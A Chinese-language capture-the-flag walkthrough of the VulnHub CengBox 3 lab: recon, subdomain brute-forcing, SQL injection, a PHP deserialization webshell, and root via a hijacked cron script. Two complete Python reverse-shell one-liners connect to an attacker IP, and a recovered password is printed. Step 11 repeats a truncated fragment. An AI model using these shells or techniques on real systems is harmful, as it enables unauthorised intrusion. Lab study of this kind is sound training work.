一、環境搭建
1、官網下載連接:https://www.vulnhub.com/entry/cengbox-3,576/
2、下載之后,使用Oracle VM VirtualBox導入靶場環境
3、為了正常練習,將靶場的網卡模式設置為橋接模式,啟動即可
二、靶場攻略
1、nmap -sP --min-hostgroup 1024 --min-parallelism 1024 10.10.114.0/24,獲得靶場真實ip
查看啟動的服務,開啟了80、443都是web服務,根據443端口服務的提示,跟這系列第二個靶場一樣得改HOSTS文件來訪問
修改之后,訪問成功
2、在主站本身,找不到任何突破口,進行子域名爆破:gobuster vhost -k -u https://ceng-company.vm/ -w subdomains-top1million-5000.txt
爆破出一個dev.ceng-company.vm的子站,重新修改hosts文件之后,訪問是個登錄頁面
3、登錄框我一般都是直接嘗試是否有SQL注入,使用BurpSuite抓包之后,利用SQLmap進行探測,確定存在注入,成功得到網站后台賬號密碼
4、使用管理賬號登錄之后,發現后台有一個ADD POEM功能,提交發現See Here功能處,是將數據提交到網站根目錄的
5、考驗反序列化漏洞利用的,那么就進行構造
然后,裝構造好的參數進行轉碼,需要轉為URL編碼之后提交
訪問主站http://ceng-company.vm/phpinfo.php,確定成功寫入
6、下一步就是寫入shell.php來進行命令執行,進一步利用,構造命令執行的文件,一樣轉碼之后提交,成功getshell
7、命令執行,輸入python3之后,出現python的調用,說明系統環境中有python3,下一步就是獲得交互shell,使用python的反彈shell命令
在kali里使用nc監聽端口,然后在上傳的webshell中執行命令:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.114.191",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")',成功反彈shell
8、查看home目錄,只有個eric用戶
pspy64查看發現定時執行/opt目錄下的login.py
查看權限,只有eric用戶可讀寫
因為是定時執行的任務,目標主機又安裝有tcpdump所以可以使用tcpdump來抓取目標主機的流量,抓取3分鍾左右
將抓取的流量包移動到靶場的html目錄中,kali里下載之后,使用strings命令查看,得到密碼,注意%2A為*號,所以密碼是3ricThompson*Covid19
9、成功登錄,得到user.txt的flag
10、下一步就是提權,免密碼執行的腳本有check.sh
check.sh腳本執行的是whatsmyip.py文件
11、使用echo命令修改login.py文件內容,
echo "import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.114.191',2345));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')" > login.py
<s.dup2(s.fileno(),2);pty.spawn('/bin/bash')" > login.py
在kali中,監聽好2345端口,等待計划執行,成功得到root權限,得到flag
完